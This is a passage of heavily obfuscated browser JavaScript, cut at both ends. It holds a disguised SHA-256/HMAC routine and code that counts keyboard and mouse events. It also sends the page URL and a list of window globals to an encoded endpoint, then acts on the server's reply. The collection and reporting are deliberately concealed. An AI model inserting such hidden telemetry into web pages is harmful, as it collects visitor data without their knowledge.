g3Gld7J=FZHYVb[0x0],_PoKZj,j2tRUWQ;_PoKZj="";function R_2lkdW(g3Gld7J){return HwsNDHD(ypO47D(ZXXPKzm(g3Gld7J)))}function FUaXU5(g3Gld7J,_PoKZj){return HwsNDHD(lwkZPmj(ZXXPKzm(g3Gld7J),ZXXPKzm(_PoKZj)))}function Umd97Q(g3Gld7J,_PoKZj){return s7MFvm(lwkZPmj(ZXXPKzm(g3Gld7J),ZXXPKzm(_PoKZj)))}function dNiP0ow(g3Gld7J,_PoKZj,j2tRUWQ){return xEv0OAf(lwkZPmj(ZXXPKzm(g3Gld7J),ZXXPKzm(_PoKZj)),j2tRUWQ)}function ypO47D(g3Gld7J){return nRl9NM(Rbmywh9(_50gmY(g3Gld7J),g3Gld7J.length*FZHYVb[0x2]))}function lwkZPmj(g3Gld7J,_PoKZj){var j2tRUWQ,R_2lkdW,FUaXU5;function Umd97Q(g3Gld7J){var _PoKZj="z>7@y}82*]F)S~kjle`=A3?/&+!KBcCb\"TQ;UR[.iMf$mOxY95|H,gDw%4Z_W:1d6(XsNrP^LtE{anvIoqu<VGpJ0h#",j2tRUWQ,FUaXU5,Umd97Q,dNiP0ow,ypO47D,lwkZPmj,HwsNDHD;N4W9hYK(j2tRUWQ=""+(g3Gld7J||""),FUaXU5=j2tRUWQ.length,Umd97Q=[],dNiP0ow=FZHYVb[0x0],ypO47D=FZHYVb[0x0],lwkZPmj=-FZHYVb[0x1]);for(HwsNDHD=FZHYVb[0x0];HwsNDHD<FUaXU5;HwsNDHD++){var s7MFvm=_PoKZj.indexOf(j2tRUWQ[HwsNDHD]);if(s7MFvm===-FZHYVb[0x1])continue;if(lwkZPmj<FZHYVb[0x0]){lwkZPmj=s7MFvm}else{N4W9hYK(lwkZPmj+=s7MFvm*FZHYVb[0xc],dNiP0ow|=lwkZPmj<<ypO47D,ypO47D+=(lwkZPmj&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Umd97Q.push(dNiP0ow&FZHYVb[0x3]),dNiP0ow>>=FZHYVb[0x2],ypO47D-=FZHYVb[0x2])}while(ypO47D>FZHYVb[0x9]);lwkZPmj=-FZHYVb[0x1]}}if(lwkZPmj>-FZHYVb[0x1]){Umd97Q.push((dNiP0ow|lwkZPmj<<ypO47D)&FZHYVb[0x3])}return t24J32(Umd97Q)}function dNiP0ow(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=Umd97Q(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}j2tRUWQ=_50gmY(g3Gld7J);if(j2tRUWQ.length>FZHYVb[0x12])j2tRUWQ=Rbmywh9(j2tRUWQ,g3Gld7J.length*FZHYVb[0x2]);var ypO47D=Array(FZHYVb[0x12]),lwkZPmj=Array(FZHYVb[0x12]);for(R_2lkdW=FZHYVb[0x0];R_2lkdW<FZHYVb[0x12];R_2lkdW++){N4W9hYK(ypO47D[R_2lkdW]=j2tRUWQ[R_2lkdW]^0x36363636,lwkZPmj[R_2lkdW]=j2tRUWQ[R_2lkdW]^0x5c5c5c5c)}FUaXU5=Rbmywh9(ypO47D.concat(_50gmY(_PoKZj)),FZHYVb[0x13]+_PoKZj.length*FZHYVb[0x2]);return nRl9NM(Rbmywh9(lwkZPmj.concat(FUaXU5),vJUdU0(dNiP0ow(0x71),FZHYVb[0x13],0x100)))}function HwsNDHD(_PoKZj){var j2tRUWQ,R_2lkdW,FUaXU5,Umd97Q;function dNiP0ow(_PoKZj){var j2tRUWQ="AHV:KTkGUJBrposMZu13^C?[%*zW{g7_ld`tqf,jY.@}+~&;|$FODP]hiIvR5many<!\"bQ>L2w6xe=/#40NEXSc89()",R_2lkdW,FUaXU5,dNiP0ow,ypO47D,g3Gld7J,lwkZPmj,HwsNDHD;N4W9hYK(R_2lkdW=""+(_PoKZj||""),FUaXU5=R_2lkdW.length,dNiP0ow=[],ypO47D=FZHYVb[0x0],g3Gld7J=FZHYVb[0x0],lwkZPmj=-FZHYVb[0x1]);for(HwsNDHD=FZHYVb[0x0];HwsNDHD<FUaXU5;HwsNDHD++){var s7MFvm=j2tRUWQ.indexOf(R_2lkdW[HwsNDHD]);if(s7MFvm===-FZHYVb[0x1])continue;if(lwkZPmj<FZHYVb[0x0]){lwkZPmj=s7MFvm}else{N4W9hYK(lwkZPmj+=s7MFvm*FZHYVb[0xc],ypO47D|=lwkZPmj<<g3Gld7J,g3Gld7J+=(lwkZPmj&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(dNiP0ow.push(ypO47D&FZHYVb[0x3]),ypO47D>>=FZHYVb[0x2],g3Gld7J-=FZHYVb[0x2])}while(g3Gld7J>FZHYVb[0x9]);lwkZPmj=-FZHYVb[0x1]}}if(lwkZPmj>-FZHYVb[0x1]){dNiP0ow.push((ypO47D|lwkZPmj<<g3Gld7J)&FZHYVb[0x3])}return t24J32(dNiP0ow)}function ypO47D(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=dNiP0ow(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}try{}catch(e){g3Gld7J=FZHYVb[0x0]}N4W9hYK(j2tRUWQ=g3Gld7J?ypO47D(0x72):ypO47D(0x73),R_2lkdW="",FUaXU5=void 0x0);for(Umd97Q=FZHYVb[0x0];Umd97Q<_PoKZj.length;Umd97Q++){N4W9hYK(FUaXU5=_PoKZj.charCodeAt(Umd97Q),R_2lkdW+=j2tRUWQ.charAt(FUaXU5>>>FZHYVb[0x17]&FZHYVb[0x14])+j2tRUWQ.charAt(FUaXU5&FZHYVb[0x14]))}return R_2lkdW}function s7MFvm(g3Gld7J){var j2tRUWQ,R_2lkdW,FUaXU5,Umd97Q;function dNiP0ow(g3Gld7J){var j2tRUWQ=",DA9i?0>XpxQ/T4kvNw5CL6Er_U{R&y(fb.o%~$=n38WOsm`dlz!I\"P^#u1M)]2@GKBjShcF<eH|}J[gVtY*q;:Z7a+",R_2lkdW,dNiP0ow,ypO47D,lwkZPmj,HwsNDHD,_PoKZj,s7MFvm;N4W9hYK(R_2lkdW=""+(g3Gld7J||""),dNiP0ow=R_2lkdW.length,ypO47D=[],lwkZPmj=FZHYVb[0x0],HwsNDHD=FZHYVb[0x0],_PoKZj=-FZHYVb[0x1]);for(s7MFvm=FZHYVb[0x0];s7MFvm<dNiP0ow;s7MFvm++){var xEv0OAf=j2tRUWQ.indexOf(R_2lkdW[s7MFvm]);if(xEv0OAf===-FZHYVb[0x1])continue;if(_PoKZj<FZHYVb[0x0]){_PoKZj=xEv0OAf}else{N4W9hYK(_PoKZj+=xEv0OAf*FZHYVb[0xc],lwkZPmj|=_PoKZj<<HwsNDHD,HwsNDHD+=(_PoKZj&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(ypO47D.push(lwkZPmj&FZHYVb[0x3]),lwkZPmj>>=FZHYVb[0x2],HwsNDHD-=FZHYVb[0x2])}while(HwsNDHD>FZHYVb[0x9]);_PoKZj=-FZHYVb[0x1]}}if(_PoKZj>-FZHYVb[0x1]){ypO47D.push((lwkZPmj|_PoKZj<<HwsNDHD)&FZHYVb[0x3])}return t24J32(ypO47D)}function ypO47D(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=dNiP0ow(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}try{}catch(e){_PoKZj=""}N4W9hYK(j2tRUWQ=ypO47D(0x74),R_2lkdW="",FUaXU5=g3Gld7J.length);for(Umd97Q=FZHYVb[0x0];Umd97Q<FUaXU5;Umd97Q+=FZHYVb[0x15]){var lwkZPmj=g3Gld7J.charCodeAt(Umd97Q)<<FZHYVb[0x12]|(Umd97Q+FZHYVb[0x1]<FUaXU5?g3Gld7J.charCodeAt(Umd97Q+FZHYVb[0x1])<<FZHYVb[0x2]:FZHYVb[0x0])|(Umd97Q+FZHYVb[0x16]<FUaXU5?g3Gld7J.charCodeAt(Umd97Q+FZHYVb[0x16]):FZHYVb[0x0]),HwsNDHD;for(HwsNDHD=FZHYVb[0x0];HwsNDHD<FZHYVb[0x17];HwsNDHD++)Umd97Q*FZHYVb[0x2]+HwsNDHD*FZHYVb[0x7]>g3Gld7J.length*FZHYVb[0x2]?R_2lkdW+=_PoKZj:R_2lkdW+=j2tRUWQ.charAt(lwkZPmj>>>FZHYVb[0x7]*(FZHYVb[0x15]-HwsNDHD)&FZHYVb[0x6])}return R_2lkdW}function xEv0OAf(g3Gld7J,_PoKZj){var j2tRUWQ=_PoKZj.length,R_2lkdW,FUaXU5,Umd97Q,dNiP0ow;R_2lkdW=Array();var ypO47D,lwkZPmj,HwsNDHD,s7MFvm;FUaXU5=Array(Math.ceil(g3Gld7J.length/FZHYVb[0x16]));for(ypO47D=FZHYVb[0x0];ypO47D<FUaXU5.length;ypO47D++)FUaXU5[ypO47D]=g3Gld7J.charCodeAt(ypO47D*FZHYVb[0x16])<<FZHYVb[0x2]|g3Gld7J.charCodeAt(ypO47D*FZHYVb[0x16]+FZHYVb[0x1]);while(FUaXU5.length>FZHYVb[0x0]){N4W9hYK(s7MFvm=Array(),HwsNDHD=FZHYVb[0x0]);for(ypO47D=FZHYVb[0x0];ypO47D<FUaXU5.length;ypO47D++){N4W9hYK(HwsNDHD=(HwsNDHD<<FZHYVb[0x12])+FUaXU5[ypO47D],lwkZPmj=Math.floor(HwsNDHD/j2tRUWQ),HwsNDHD-=lwkZPmj*j2tRUWQ);if(s7MFvm.length>FZHYVb[0x0]||lwkZPmj>FZHYVb[0x0])s7MFvm[s7MFvm.length]=lwkZPmj}N4W9hYK(R_2lkdW[R_2lkdW.length]=HwsNDHD,FUaXU5=s7MFvm)}Umd97Q="";for(ypO47D=R_2lkdW.length-FZHYVb[0x1];ypO47D>=FZHYVb[0x0];ypO47D--)Umd97Q+=_PoKZj.charAt(R_2lkdW[ypO47D]);dNiP0ow=Math.ceil(g3Gld7J.length*FZHYVb[0x2]/(Math.log(_PoKZj.length)/Math.log(FZHYVb[0x16])));for(ypO47D=Umd97Q.length;ypO47D<dNiP0ow;ypO47D++)Umd97Q=_PoKZj[FZHYVb[0x0]]+Umd97Q;return Umd97Q}function ZXXPKzm(g3Gld7J){var _PoKZj="",j2tRUWQ;j2tRUWQ=-FZHYVb[0x1];var R_2lkdW,FUaXU5;while(++j2tRUWQ<g3Gld7J.length){N4W9hYK(R_2lkdW=g3Gld7J.charCodeAt(j2tRUWQ),FUaXU5=j2tRUWQ+FZHYVb[0x1]<g3Gld7J.length?g3Gld7J.charCodeAt(j2tRUWQ+FZHYVb[0x1]):FZHYVb[0x0]);if(0xd800<=R_2lkdW&&R_2lkdW<=0xdbff&&0xdc00<=FUaXU5&&FUaXU5<=0xdfff){N4W9hYK(R_2lkdW=0x10000+((R_2lkdW&FZHYVb[0x18])<<FZHYVb[0x20])+(FUaXU5&FZHYVb[0x18]),j2tRUWQ++)}if(R_2lkdW<=FZHYVb[0x19])_PoKZj+=String.fromCharCode(R_2lkdW);else if(R_2lkdW<=0x7ff)_PoKZj+=String.fromCharCode(0xc0|R_2lkdW>>>FZHYVb[0x7]&FZHYVb[0x1a],FZHYVb[0x1b]|R_2lkdW&FZHYVb[0x6]);else if(R_2lkdW<=FZHYVb[0x23])_PoKZj+=String.fromCharCode(0xe0|R_2lkdW>>>FZHYVb[0xa]&FZHYVb[0x14],FZHYVb[0x1b]|R_2lkdW>>>FZHYVb[0x7]&FZHYVb[0x6],FZHYVb[0x1b]|R_2lkdW&FZHYVb[0x6]);else if(R_2lkdW<=0x1fffff)_PoKZj+=String.fromCharCode(0xf0|R_2lkdW>>>FZHYVb[0x1c]&FZHYVb[0x9],FZHYVb[0x1b]|R_2lkdW>>>FZHYVb[0xa]&FZHYVb[0x6],FZHYVb[0x1b]|R_2lkdW>>>FZHYVb[0x7]&FZHYVb[0x6],FZHYVb[0x1b]|R_2lkdW&FZHYVb[0x6])}return _PoKZj}function _50gmY(g3Gld7J){var _PoKZj=Array(g3Gld7J.length>>FZHYVb[0x16]),j2tRUWQ,j2tRUWQ;for(j2tRUWQ=FZHYVb[0x0];j2tRUWQ<_PoKZj.length;j2tRUWQ++)_PoKZj[j2tRUWQ]=FZHYVb[0x0];for(j2tRUWQ=FZHYVb[0x0];j2tRUWQ<g3Gld7J.length*FZHYVb[0x2];j2tRUWQ+=FZHYVb[0x2])_PoKZj[j2tRUWQ>>FZHYVb[0x1e]]|=(g3Gld7J.charCodeAt(j2tRUWQ/FZHYVb[0x2])&FZHYVb[0x3])<<FZHYVb[0x1f]-j2tRUWQ%FZHYVb[0x1d];return _PoKZj}function nRl9NM(g3Gld7J){var _PoKZj="",j2tRUWQ;for(j2tRUWQ=FZHYVb[0x0];j2tRUWQ<g3Gld7J.length*FZHYVb[0x1d];j2tRUWQ+=FZHYVb[0x2])_PoKZj+=String.fromCharCode(g3Gld7J[j2tRUWQ>>FZHYVb[0x1e]]>>>FZHYVb[0x1f]-j2tRUWQ%FZHYVb[0x1d]&FZHYVb[0x3]);return _PoKZj}function KZmjaK(g3Gld7J,_PoKZj){return g3Gld7J>>>_PoKZj|g3Gld7J<<FZHYVb[0x1d]-_PoKZj}function vbVLHv(g3Gld7J,_PoKZj){return g3Gld7J>>>_PoKZj}function IiiwLR1(g3Gld7J,_PoKZj,j2tRUWQ){return g3Gld7J&_PoKZj^~g3Gld7J&j2tRUWQ}function sm3mfM(g3Gld7J,_PoKZj,j2tRUWQ){return g3Gld7J&_PoKZj^g3Gld7J&j2tRUWQ^_PoKZj&j2tRUWQ}function KmzQ7gP(g3Gld7J){return KZmjaK(g3Gld7J,FZHYVb[0x16])^KZmjaK(g3Gld7J,FZHYVb[0xf])^KZmjaK(g3Gld7J,0x16)}function DwugHFS(g3Gld7J){return KZmjaK(g3Gld7J,FZHYVb[0x7])^KZmjaK(g3Gld7J,0xb)^KZmjaK(g3Gld7J,0x19)}function eTp757M(g3Gld7J){return KZmjaK(g3Gld7J,FZHYVb[0x9])^KZmjaK(g3Gld7J,FZHYVb[0x1c])^vbVLHv(g3Gld7J,FZHYVb[0x15])}function v8fEFC(g3Gld7J){return KZmjaK(g3Gld7J,0x11)^KZmjaK(g3Gld7J,FZHYVb[0x21])^vbVLHv(g3Gld7J,FZHYVb[0x20])}j2tRUWQ=new Array(0x428a2f98,0x71374491,-0x4a3f0431,-0x164a245b,0x3956c25b,0x59f111f1,-0x6dc07d5c,-0x54e3a12b,-0x27f85568,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,-0x7f214e02,-0x6423f959,-0x3e640e8c,-0x1b64963f,-0x1041b87a,0xfc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,-0x67c1aeae,-0x57ce3993,-0x4ffcd838,-0x40a68039,-0x391ff40d,-0x2a586eb9,0x6ca6351,0x14292967,0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,-0x7e3d36d2,-0x6d8dd37b,-0x5d40175f,-0x57e599b5,-0x3db47490,-0x3893ae5d,-0x2e6d17e7,-0x2966f9dc,-0xbf1ca7b,0x106aa070,0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,0x748f82ee,0x78a5636f,-0x7b3787ec,-0x7338fdf8,-0x6f410006,-0x5baf9315,-0x41065c09,-0x398e870e);function Rbmywh9(g3Gld7J,_PoKZj){var R_2lkdW=new Array(0x6a09e667,-0x4498517b,0x3c6ef372,-0x5ab00ac6,0x510e527f,-0x64fa9774,0x1f83d9ab,0x5be0cd19),FUaXU5;FUaXU5=new Array(FZHYVb[0x22]);var Umd97Q,dNiP0ow,ypO47D,lwkZPmj,HwsNDHD,s7MFvm,xEv0OAf,ZXXPKzm,_50gmY,nRl9NM,KZmjaK,vbVLHv;N4W9hYK(g3Gld7J[_PoKZj>>FZHYVb[0x1e]]|=FZHYVb[0x1b]<<FZHYVb[0x1f]-_PoKZj%FZHYVb[0x1d],g3Gld7J[(_PoKZj+FZHYVb[0x22]>>0x9<<FZHYVb[0x17])+FZHYVb[0x14]]=_PoKZj);for(_50gmY=FZHYVb[0x0];_50gmY<g3Gld7J.length;_50gmY+=FZHYVb[0x12]){N4W9hYK(Umd97Q=R_2lkdW[FZHYVb[0x0]],dNiP0ow=R_2lkdW[FZHYVb[0x1]],ypO47D=R_2lkdW[FZHYVb[0x16]],lwkZPmj=R_2lkdW[FZHYVb[0x15]],HwsNDHD=R_2lkdW[FZHYVb[0x17]],s7MFvm=R_2lkdW[FZHYVb[0x1e]],xEv0OAf=R_2lkdW[FZHYVb[0x7]],ZXXPKzm=R_2lkdW[FZHYVb[0x9]]);for(nRl9NM=FZHYVb[0x0];nRl9NM<FZHYVb[0x22];nRl9NM++){N4W9hYK(nRl9NM<FZHYVb[0x12]?FUaXU5[nRl9NM]=g3Gld7J[nRl9NM+_50gmY]:FUaXU5[nRl9NM]=J47H_Bw(J47H_Bw(J47H_Bw(v8fEFC(FUaXU5[nRl9NM-FZHYVb[0x16]]),FUaXU5[nRl9NM-FZHYVb[0x9]]),eTp757M(FUaXU5[nRl9NM-FZHYVb[0x14]])),FUaXU5[nRl9NM-FZHYVb[0x12]]),KZmjaK=J47H_Bw(J47H_Bw(J47H_Bw(J47H_Bw(ZXXPKzm,DwugHFS(HwsNDHD)),IiiwLR1(HwsNDHD,s7MFvm,xEv0OAf)),j2tRUWQ[nRl9NM]),FUaXU5[nRl9NM]),vbVLHv=J47H_Bw(KmzQ7gP(Umd97Q),sm3mfM(Umd97Q,dNiP0ow,ypO47D)),ZXXPKzm=xEv0OAf,xEv0OAf=s7MFvm,s7MFvm=HwsNDHD,HwsNDHD=J47H_Bw(lwkZPmj,KZmjaK),lwkZPmj=ypO47D,ypO47D=dNiP0ow,dNiP0ow=Umd97Q,Umd97Q=J47H_Bw(KZmjaK,vbVLHv))}N4W9hYK(R_2lkdW[FZHYVb[0x0]]=J47H_Bw(Umd97Q,R_2lkdW[FZHYVb[0x0]]),R_2lkdW[FZHYVb[0x1]]=J47H_Bw(dNiP0ow,R_2lkdW[FZHYVb[0x1]]),R_2lkdW[FZHYVb[0x16]]=J47H_Bw(ypO47D,R_2lkdW[FZHYVb[0x16]]),R_2lkdW[FZHYVb[0x15]]=J47H_Bw(lwkZPmj,R_2lkdW[FZHYVb[0x15]]),R_2lkdW[FZHYVb[0x17]]=J47H_Bw(HwsNDHD,R_2lkdW[FZHYVb[0x17]]),R_2lkdW[FZHYVb[0x1e]]=J47H_Bw(s7MFvm,R_2lkdW[FZHYVb[0x1e]]),R_2lkdW[FZHYVb[0x7]]=J47H_Bw(xEv0OAf,R_2lkdW[FZHYVb[0x7]]),R_2lkdW[FZHYVb[0x9]]=J47H_Bw(ZXXPKzm,R_2lkdW[FZHYVb[0x9]]))}return R_2lkdW}function J47H_Bw(g3Gld7J,_PoKZj){var j2tRUWQ=(g3Gld7J&FZHYVb[0x23])+(_PoKZj&FZHYVb[0x23]),R_2lkdW;R_2lkdW=(g3Gld7J>>FZHYVb[0x12])+(_PoKZj>>FZHYVb[0x12])+(j2tRUWQ>>FZHYVb[0x12]);return R_2lkdW<<FZHYVb[0x12]|j2tRUWQ&FZHYVb[0x23]}return{hex:R_2lkdW,b64:Umd97Q,any:dNiP0ow,hex_hmac:FUaXU5,b64_hmac:Umd97Q,any_hmac:dNiP0ow}}();console.log(g3Gld7J)}N4W9hYK(ypO47D=cUL0VT(),io4LB2P(_PoKZj(0x75),{[_PoKZj(0x76)]:Umd97Q,u:window[_PoKZj(0x77)][_PoKZj(0x78)],[_PoKZj(0x79)]:Object[_PoKZj(0x7a)](window)[_PoKZj(0x7b)](g3Gld7J=>{function j2tRUWQ(g3Gld7J){var j2tRUWQ="c<4qPL\"0VgNYun&kD!C,RMy%=pJG+:_IQ~1;#lrb9[vs({/maS67.U2W`fFO^35}w]|>X$HExBKz?@i8*h)AjZodetT",MSUxhJ2,_PoKZj,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),_PoKZj=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<_PoKZj;eS9fQMb++){var Umd97Q=j2tRUWQ.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function MSUxhJ2(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=j2tRUWQ(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}return g3Gld7J[FZHYVb[0x0]]===g3Gld7J[FZHYVb[0x0]][_PoKZj(0x7c)]()&&!g3Gld7J[MSUxhJ2(0x7d)]("on")})})[_PoKZj(0x7e)](g3Gld7J=>{const j2tRUWQ=JSON[_PoKZj(FZHYVb[0x19])](g3Gld7J);N4W9hYK(z12fX0=cUL0VT(),FUaXU5=j2tRUWQ[_PoKZj(FZHYVb[0x1b])],j2tRUWQ[FZHYVb[0x24]]&&WuMNj_9(j2tRUWQ[FZHYVb[0x24]]))})[_PoKZj(0x81)](()=>{return FZHYVb[0x0]}))},0x1f4);let C1tndH=!FZHYVb[0x1],lwkZPmj=FZHYVb[0x0],HwsNDHD=FZHYVb[0x0];N4W9hYK(document[_PoKZj(FZHYVb[0x25])](_PoKZj(0x83),g3Gld7J=>{return g3Gld7J[_PoKZj(0x84)]&&lwkZPmj++}),document[_PoKZj(FZHYVb[0x25])](_PoKZj(0x85),g3Gld7J=>{function _PoKZj(g3Gld7J){var _PoKZj="MDkWPsZxhR*n!{lb&XKQ4)}tA;J`H@?:UVY.5fc3,(dp%IjwFE=>r08NiBSGev|TL2]mgCu1O#q/o~_<\"+[za$9^6y7",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function MSUxhJ2(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=_PoKZj(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}return g3Gld7J[MSUxhJ2(0x86)]&&HwsNDHD++}),window[_PoKZj(0x87)]={["cl"](g3Gld7J,_PoKZj,MSUxhJ2){function j2tRUWQ(g3Gld7J){var _PoKZj="&ahkiHERUSKjYLgc/^D!lGu#txr@z\",[5JV3qP9>1om8_F?|=.{~INpOWQsd0nZ+;27T6vCywb$f)}<4*]X(%BMA`e:",j2tRUWQ,R_2lkdW,Q4sOnFn,nco7OV,FUaXU5,eS9fQMb,Umd97Q;N4W9hYK(j2tRUWQ=""+(g3Gld7J||""),R_2lkdW=j2tRUWQ.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],FUaXU5=FZHYVb[0x0],eS9fQMb=-FZHYVb[0x1]);for(Umd97Q=FZHYVb[0x0];Umd97Q<R_2lkdW;Umd97Q++){var RpmYYq=_PoKZj.indexOf(j2tRUWQ[Umd97Q]);if(RpmYYq===-FZHYVb[0x1])continue;if(eS9fQMb<FZHYVb[0x0]){eS9fQMb=RpmYYq}else{N4W9hYK(eS9fQMb+=RpmYYq*FZHYVb[0xc],nco7OV|=eS9fQMb<<FUaXU5,FUaXU5+=(eS9fQMb&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],FUaXU5-=FZHYVb[0x2])}while(FUaXU5>FZHYVb[0x9]);eS9fQMb=-FZHYVb[0x1]}}if(eS9fQMb>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|eS9fQMb<<FUaXU5)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function R_2lkdW(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=j2tRUWQ(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}document[R_2lkdW(0x88)](g3Gld7J)?.addEventListener(R_2lkdW(0x89),()=>{if(C1tndH){function g3Gld7J(g3Gld7J){var j2tRUWQ="W#8w_%/Ku4E&=?{pVFQJa}:6g\"DOG0kLx.o)U[<hj$2(ClR~B5S]XcI+ey`H7>|M;rsbAz*31vNf,PtTYimnZd@^9q!",eS9fQMb,RpmYYq,_PoKZj,R_2lkdW,Q4sOnFn,nco7OV,FUaXU5;N4W9hYK(eS9fQMb=""+(g3Gld7J||""),RpmYYq=eS9fQMb.length,_PoKZj=[],R_2lkdW=FZHYVb[0x0],Q4sOnFn=FZHYVb[0x0],nco7OV=-FZHYVb[0x1]);for(FUaXU5=FZHYVb[0x0];FUaXU5<RpmYYq;FUaXU5++){var Umd97Q=j2tRUWQ.indexOf(eS9fQMb[FUaXU5]);if(Umd97Q===-FZHYVb[0x1])continue;if(nco7OV<FZHYVb[0x0]){nco7OV=Umd97Q}else{N4W9hYK(nco7OV+=Umd97Q*FZHYVb[0xc],R_2lkdW|=nco7OV<<Q4sOnFn,Q4sOnFn+=(nco7OV&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(_PoKZj.push(R_2lkdW&FZHYVb[0x3]),R_2lkdW>>=FZHYVb[0x2],Q4sOnFn-=FZHYVb[0x2])}while(Q4sOnFn>FZHYVb[0x9]);nco7OV=-FZHYVb[0x1]}}if(nco7OV>-FZHYVb[0x1]){_PoKZj.push((R_2lkdW|nco7OV<<Q4sOnFn)&FZHYVb[0x3])}return t24J32(_PoKZj)}function j2tRUWQ(j2tRUWQ){if(typeof rxdmS4[j2tRUWQ]===FZHYVb[0x5]){return rxdmS4[j2tRUWQ]=g3Gld7J(FlCAu25[j2tRUWQ])}return rxdmS4[j2tRUWQ]}if(j2tRUWQ(0x8a)in xEv0OAf){eS9fQMb()}function eS9fQMb(){}return}C1tndH=!FZHYVb[0x0];const RpmYYq=cUL0VT();N4W9hYK(Q4sOnFn[R_2lkdW(0x8b)](nco7OV,RpmYYq+ZkiMN6J*FZHYVb[0x15]+""),setTimeout(()=>{function g3Gld7J(g3Gld7J){var j2tRUWQ="BgJTpWQAlCa0:F_8If{~zH64=P#<e*`bm>R)dDXGq3/ZSM5K@j[r,(Uu!.?n7sxEN$|9v^kYhiLV&Ot1o2+%\"yw;}]c",eS9fQMb,RpmYYq,_PoKZj,R_2lkdW,Q4sOnFn,nco7OV,FUaXU5;N4W9hYK(eS9fQMb=""+(g3Gld7J||""),RpmYYq=eS9fQMb.length,_PoKZj=[],R_2lkdW=FZHYVb[0x0],Q4sOnFn=FZHYVb[0x0],nco7OV=-FZHYVb[0x1]);for(FUaXU5=FZHYVb[0x0];FUaXU5<RpmYYq;FUaXU5++){var 